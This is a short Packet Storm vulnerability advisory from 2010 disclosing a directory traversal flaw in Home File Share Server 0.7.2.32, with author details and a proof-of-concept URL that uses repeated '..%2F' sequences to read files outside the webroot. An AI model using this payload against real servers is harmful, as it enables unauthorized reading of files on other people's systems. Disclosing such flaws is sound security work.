Home File Share Server 0.7.2.32 Directory Traversal

2010-11-02T00:00:00
ID PACKETSTORM:95401
Type packetstorm
Reporter AutoSec Tools
Modified 2010-11-02T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Home File Share Server 0.7.2.32  
Vulnerability...........Directory Traversal  
Download................http://downstairs.dnsalias.net/homefileshareserver.html  
Release Date............10/31/2010  
Tested On...............Windows XP  
------------------------------------------------------------------------  
Author..................John Leitch  
Site....................http://www.johnleitch.net/  
Email...................john.leitch5@gmail.com  
------------------------------------------------------------------------  
  
--Description--  
  
A directory traversal vulnerability in Home File Share Server 0.7.2.32  
can be exploited to read files outside of the webroot directory.  
  
  
--Exploit--  
  
..%2F  
  
The user must be authenticated and the path must begin with a real folder.  
  
  
--PoC--  
  
http://localhost/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F  
`